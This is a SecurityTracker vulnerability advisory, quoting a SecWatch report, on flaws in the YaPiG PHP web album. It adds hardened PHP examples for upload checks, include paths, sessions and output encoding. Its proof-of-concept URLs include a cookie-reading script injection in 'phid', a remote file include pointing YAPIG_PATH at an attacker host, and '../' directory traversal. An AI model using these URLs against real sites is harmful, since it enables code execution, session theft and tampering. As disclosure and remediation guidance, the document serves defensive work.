SecurityTracker.com
Category:   Application (Multimedia)  >   YaPiG Vendors:   yapig.sourceforge.net
YaPiG Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Create/Delete Directories and Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014103
SecurityTracker URL:  http://securitytracker.com/id/1014103
CVE Reference:   CVE-2005-1881, CVE-2005-1882, CVE-2005-1883, CVE-2005-1884, CVE-2005-1885, CVE-2005-1886   (Links to External Site)
Updated:  Jun 9 2005
Original Entry Date:  Jun 5 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.92b, 0.93u, and 0.94u
Description:   SecWatch reported several vulnerabilities in YaPiG. A remote user can conduct cross-site scripting attacks and determine the installation path. If PHP's register_globals option is enabled, a remote user can also cause the target web service to include and execute arbitrary local or remote PHP files. A remote authenticated user can upload and execute arbitrary PHP code and operating system commands on the target system and can create and delete directories outside the gallery directory.

The 'upload.php' script does not properly validate the file extension of uploaded image files. A remote authenticated user can upload a file containing arbitrary content, such as PHP code, under a name that the web server will hand to the PHP interpreter, and then request the file to have it executed. The PHP code, including any operating system commands it runs, will execute with the privileges of the target web service.

Some demonstration exploit URLs for the file inclusion issue (described below) are provided; the first applies to version 0.92b and the second to versions 0.93u and 0.94u:

http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php

http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

The 'upload.php' script also fails to properly validate user-supplied input in the 'dir' parameter before using the data in rmdir() and mkdir() function calls. A remote authenticated user can submit specially crafted parameter values containing '../' directory traversal sequences to create and delete arbitrary directories located outside of the gallery directory.

Some demonstration exploit URLs are provided:

http://[target]/upload.php?step=rmdir&dir=../folder

http://[target]/upload.php?step=mkdir&dir=../folder
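The following is an added example, not YaPiG's own code, of how a step handler for 'upload.php' can close both of the holes above: the 'dir' value is reduced to a canonical path that must stay under the gallery root, and an upload is accepted only when its extension is on an allowlist, its bytes are a real image of that type, and it is stored under a server-generated name. The gallery root location, the allowed extensions, the POST field names and the require_login() helper are assumptions.

```php
<?php
// Added example (not YaPiG's own code): a hardened 'upload.php' step
// handler. The gallery root, allowed extensions, field names and
// require_login() are assumptions.

// Canonical gallery root. realpath() returns false if it does not exist,
// and a false root would make every containment check below meaningless.
define('GALLERY_ROOT', realpath(__DIR__ . '/gallery'));
if (GALLERY_ROOT === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('gallery root missing');
}

// Map a user-supplied 'dir' value to a path under GALLERY_ROOT, or return
// false. The character allowlist already rejects "../", "." and NUL bytes;
// the realpath() comparison additionally catches a symlink inside the
// gallery that points outside it. For mkdir the target does not exist yet,
// so the (existing) parent directory is what gets canonicalised.
function gallery_dir($userDir)
{
    if (!is_string($userDir)
        || !preg_match('~^[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*$~', $userDir)) {
        return false;
    }
    $candidate = GALLERY_ROOT . '/' . $userDir;
    $parent = realpath(dirname($candidate));
    if ($parent === false
        || ($parent !== GALLERY_ROOT && strpos($parent, GALLERY_ROOT . '/') !== 0)) {
        return false;
    }
    return $candidate;
}

// Decide whether an uploaded file may be stored and under what name.
// Returns the new file name or false. The extension must be on the
// allowlist AND getimagesize() must report that same image type, and the
// client-supplied name is never reused, so "shell.php" or "shell.php.jpg"
// cannot land on disk under a name the web server might execute.
function safe_upload_name(array $file)
{
    $allowed = array('jpg' => IMAGETYPE_JPEG, 'jpeg' => IMAGETYPE_JPEG,
                     'png' => IMAGETYPE_PNG,  'gif'  => IMAGETYPE_GIF);
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return false;
    }
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== $allowed[$ext]) {
        return false;
    }
    return bin2hex(random_bytes(8)) . '.' . $ext;   // random_bytes(): PHP 7+
}

// State-changing steps are only honoured over POST, so a plain link such as
// upload.php?step=rmdir&dir=... cannot trigger them.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('HTTP/1.1 405 Method Not Allowed');
    exit;
}
// require_login();   // assumed helper: stops the script for anonymous users

$step = isset($_POST['step']) ? $_POST['step'] : '';
$dir  = gallery_dir(isset($_POST['dir']) ? $_POST['dir'] : '');
if ($dir === false) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid directory name');
}
switch ($step) {
    case 'mkdir':
        echo mkdir($dir, 0755) ? 'created' : 'failed';
        break;
    case 'rmdir':
        echo rmdir($dir) ? 'removed' : 'failed';
        break;
    case 'upload':
        $name = isset($_FILES['image']) ? safe_upload_name($_FILES['image']) : false;
        if ($name === false || !is_dir($dir)) {
            header('HTTP/1.1 400 Bad Request');
            exit('upload rejected');
        }
        move_uploaded_file($_FILES['image']['tmp_name'], $dir . '/' . $name);
        echo 'stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
        break;
    default:
        header('HTTP/1.1 400 Bad Request');
        exit('unknown step');
}
```

Independently of the code, the gallery directory should not be allowed to execute scripts at all (with mod_php, `php_flag engine off` in that directory's .htaccess), so that a bypass of the name check still yields a static file rather than code execution.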

Several scripts include files relative to the 'BASE_DIR' (version 0.92b) or 'YAPIG_PATH' (versions 0.93u and 0.94u) variable. When PHP's register_globals option is enabled, a remote user can set these variables via request parameters and supply a specially crafted value to cause arbitrary PHP code from a local file or a remote site to be included and executed by the target web service. No authentication is required.
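As an added illustration (not code from YaPiG), the vulnerable include pattern the advisory describes is reconstructed in a comment next to a hardened form that derives the base path from the script's own location and refuses to run under the PHP settings that make the attack reachable. The included file name 'inc/common.php' is an assumption.

```php
<?php
// Added example (not YaPiG's own code). 'inc/common.php' is an assumption.

// Vulnerable shape, reconstructed from the advisory (do not use):
// with register_globals=On the request
//   last_gallery.php?YAPIG_PATH=http://[attacker]/
// pre-populates $YAPIG_PATH before this line runs, and PHP fetches and
// executes http://[attacker]/inc/common.php. Remote includes are governed
// by allow_url_include (PHP 5.2+) and, before that, by allow_url_fopen.
//
//   include($YAPIG_PATH . '/inc/common.php');

// Runtime guard: refuse to serve under a configuration that lets request
// data pre-populate variables or lets include() fetch URLs. register_globals
// was removed in PHP 5.4; ini_get() then returns false and the check passes.
function include_env_is_safe()
{
    return !ini_get('register_globals') && !ini_get('allow_url_include');
}
if (!include_env_is_safe()) {
    header('HTTP/1.1 503 Service Unavailable');
    exit('insecure PHP configuration: register_globals or allow_url_include is on');
}

// Hardened shape: the base directory is a constant computed from the
// script's own location. A constant cannot be overwritten by a request
// variable, and the value is never taken from user input at all.
define('YAPIG_PATH', dirname(__FILE__));
require YAPIG_PATH . '/inc/common.php';
```

The guard is a stopgap for installations that cannot change php.ini; the actual fix is that no include path is ever built from a variable that request data can populate.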

The 'view.php' script does not properly validate user-supplied input in the 'phid' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the YaPiG software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Several parameters that 'view.php' accepts via POST when a remote user adds a new comment are also not sanitized and can be used in the same way to conduct cross-site scripting attacks.

If the non-default '$USE_COOKIES=true;' setting is enabled, the system stores authentication data in plain text in cookies on the target user's browser. A local user on the target user's system can read those cookies and obtain the authentication data, gaining access to the web album; the cross-site scripting flaw above gives a remote user the same access to those cookies.
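The design change a reviewer would ask for, as an added example and not YaPiG's own code: the browser holds only an opaque, HttpOnly session identifier and the credentials stay on the server. The cookie names, the session layout and the verify_login() helper are assumptions.

```php
<?php
// Added example (not YaPiG's own code): server-side session instead of
// credential cookies. Cookie names, session keys and verify_login() are
// assumptions.

// Vulnerable shape, reconstructed from the advisory (do not use): the
// browser keeps the credentials themselves, readable by any local user
// and by any script that can reach document.cookie.
//   setcookie('yapig_user', $user, time() + 86400);
//   setcookie('yapig_pass', $pass, time() + 86400);

// Hardened shape: only an opaque session id reaches the browser, flagged
// HttpOnly so page script cannot read it and Secure when served over TLS.
// (HttpOnly through session_set_cookie_params() requires PHP 5.2+.)
function start_secure_session()
{
    $secure = !empty($_SERVER['HTTPS']);
    session_set_cookie_params(0, '/', '', $secure, true);
    session_start();
}

// Called after the credentials have been verified server-side. The id is
// rotated so a pre-login id cannot be fixated, and only the user name is
// kept; the password is never stored anywhere client-visible.
function login_user($username)
{
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    // Migration: expire any credential cookies left over from the old scheme.
    setcookie('yapig_user', '', 1, '/');
    setcookie('yapig_pass', '', 1, '/');
}

function current_user()
{
    return isset($_SESSION['user']) ? $_SESSION['user'] : null;
}

start_secure_session();
// verify_login($user, $pass) is assumed to check the submitted credentials
// against the server-side store; the function_exists() guard only keeps
// this example runnable where that helper is absent.
if (isset($_POST['user'], $_POST['pass'])
    && function_exists('verify_login')
    && verify_login($_POST['user'], $_POST['pass'])) {
    login_user($_POST['user']);
}
```

With this in place the cross-site scripting flaw can still act on the site as the victim for the life of the session, but it can no longer read a reusable credential out of document.cookie.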

A remote user can also supply a non-integer 'phid' value to trigger a PHP error message that discloses the installation path, as in the following URL:

http://[target]/view.php?gid=1&phid=alpha
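The cross-site scripting flaw in 'phid', the unsanitized comment fields and the path disclosure on a non-integer 'phid' share one root cause: raw request data reaches HTML output and error paths untyped. The following added example (not YaPiG's own code) shows the corrected handling for 'view.php': identifiers are accepted only as positive integers, a bad value yields a generic 404 rather than a PHP warning, and every string written into the page, including stored comments, goes through one encoding helper. The rendered markup and the sample comment are constructed for the example.

```php
<?php
// Added example (not YaPiG's own code). The markup, render_comment() and
// the sample comment text are constructed for illustration.

// Never show PHP errors to clients: the warning produced by a failed
// lookup for phid=alpha is exactly what leaks the installation path.
ini_set('display_errors', '0');

// Accept only a positive decimal integer of sane length; null otherwise.
function parse_id($raw)
{
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int)$raw;
}

// Single encoding helper for anything that lands inside HTML.
function h($s)
{
    return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8');
}

// Stored comments are untrusted input too: encode at render time, then add
// line breaks. Encoding first means nl2br()'s <br /> tags are the only
// markup that can appear in the output.
function render_comment($text)
{
    return nl2br(h($text));
}

$gid  = parse_id(isset($_GET['gid'])  ? $_GET['gid']  : '');
$phid = parse_id(isset($_GET['phid']) ? $_GET['phid'] : '');
if ($gid === null || $phid === null) {
    // Generic response: the rejected value is not echoed, nothing is traced.
    header('HTTP/1.1 404 Not Found');
    exit('Not found');
}

// Vulnerable shape, reconstructed from the advisory (do not use): the raw
// parameter sits inside an attribute, so
//   phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
// closes the attribute and the tag and the script runs in the site's origin.
//   echo '<img src="photo.php?phid=' . $_GET['phid'] . '">';

// Hardened: $phid is already an integer, and it is still encoded so the
// same helper protects every other value on the page.
echo '<img src="photo.php?gid=' . h($gid) . '&amp;phid=' . h($phid) . '" alt="">';

// Constructed sample of a stored comment containing a script payload; the
// helper turns the angle brackets into entities before it reaches the browser.
$sample = "Nice shot!\n<script>alert(document.cookie)</script>";
echo '<div class="comment">' . render_comment($sample) . '</div>';
```

Casting alone is not enough for the comment fields, which are free text by design; for those, encoding at output time is the control, and it must be applied everywhere the stored text is printed, not only on the page that accepted it.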

The vendor was notified on May 30, 2005, without response.

SecWatch reported these vulnerabilities, which were discovered by an anonymous person.

The original advisory is available at:

http://secwatch.org/advisories/secwatch/20050530_yapig.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the YaPiG software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can cause arbitrary local or remote PHP code to be included and executed by the target web service when PHP's register_globals option is enabled.

A remote authenticated user can upload and execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote authenticated user can create and delete directories outside the gallery directory on the target system.

A remote user can determine the installation path. A local user on the target user's system can obtain plain text authentication data if the non-default '$USE_COOKIES=true;' setting is enabled.

Solution:   No solution was available at the time of this entry. The reporter's advisory (reproduced below) lists workarounds: set 'register_globals=Off' in php.ini, do not display errors to clients on production systems, and filter malicious input at an HTTP proxy or firewall with URL filtering capabilities.
Vendor URL:  yapig.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  YaPiG Remote Arbitrary File Inclusion,


======================================================================

                       SecWatch 04/06/2005

     YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting
            and Information Disclosure Vulnerabilities

======================================================================
Table of Contents

Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8

======================================================================
1) Introduction

Homepage: http://yapig.sourceforge.net/
Overview: YaPiG is a simple but powerful web album.
Advisory: http://secwatch.org/advisories/secwatch/20050530_yapig.txt
SWID: 1010769

======================================================================
2) Affected

YaPiG version 0.92b, 0.93u and 0.94u.

Prior versions may also be affected.

======================================================================
3) Severity

Rating: Less Critical
Impact: Exposure of system information
        System access
        Manipulation of data
        Cross Site Scripting
Where:  From remote
Action: Public disclosure

======================================================================
4) Description of Vulnerabilities

Multiple input validation and design vulnerabilities in YaPiG have been
reported, which can be exploited by remote users to execute arbitrary
code, conduct cross-site scripting attacks, disclose sensitive
information, create and remove arbitrary directories and potentially gain
administrative access to the web album.

The "upload.php" script fails to verify the extension of uploaded images;
a remote, authenticated user can upload arbitrary files (e.g. php files)
to execute arbitrary commands on the target system with privileges of the
target web server.

Numerous scripts insecurely include scripts; if register_globals is
enabled, a remote, unauthenticated user can include arbitrary files from
local and remote resources.

The "view.php" script fails to correctly sanitise user-supplied input
passed to the "phid" parameter, which a remote user can exploit to execute
arbitrary script code in the security context of an affected website, as a
result the code will be able to access any of the target user's cookies,
access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.

The "view.php" script also fails to sanitise user-supplied input POSTed to
various parameters when adding a new comment, which can also be exploited
to conduct cross-site scripting attacks.

The "view.php" script also discloses the full installation path upon a
non-integer value being passed to the "phid" parameter.

The "upload.php" script fails to validate user-supplied input passed to
the "dir" parameter before being used in "rmdir()" and "mkdir()" calls. A
remote, authenticated user can create and remove arbitrary directories
outside of the gallery directory via the common "../" directory traversal
characters.

If "$USE_COOKIES=true;" is set (non-default) authentication details are
stored in plain text in session cookies. A local user can access browser
cookies to gain administrative access to the web album.

Various other scripts/parameters are reportedly affected by similar issues.

======================================================================
5) Proof of Concept

Cross-Site Scripting:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Arbitrary File Inclusion:
Version 0.92b:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/0.94u:
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

Arbitrary Directory Removal:
http://[target]/upload.php?step=rmdir&dir=../folder

Arbitrary Directory Creation:
http://[target]/upload.php?step=mkdir&dir=../folder

Information Disclosure:
http://[target]/view.php?gid=1&phid=alpha

======================================================================
6) Solution

Edit source manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via a HTTP proxy or
firewall with URL filtering capabilities.

Production systems should not display errors to clients.

Set 'register_globals=Off' in php.ini.

Use another product.

======================================================================
7) Time Line
29/05/2005 - Information reported to SecWatch.
30/05/2005 - Information validated by SecWatch.
             Vendor notified, no response.
02/06/2005 - Vendor notified via alternative e-mail address, no response.
04/06/2005 - Public disclosure.

======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.

Copyright 2019, SecurityGlobal.net LLC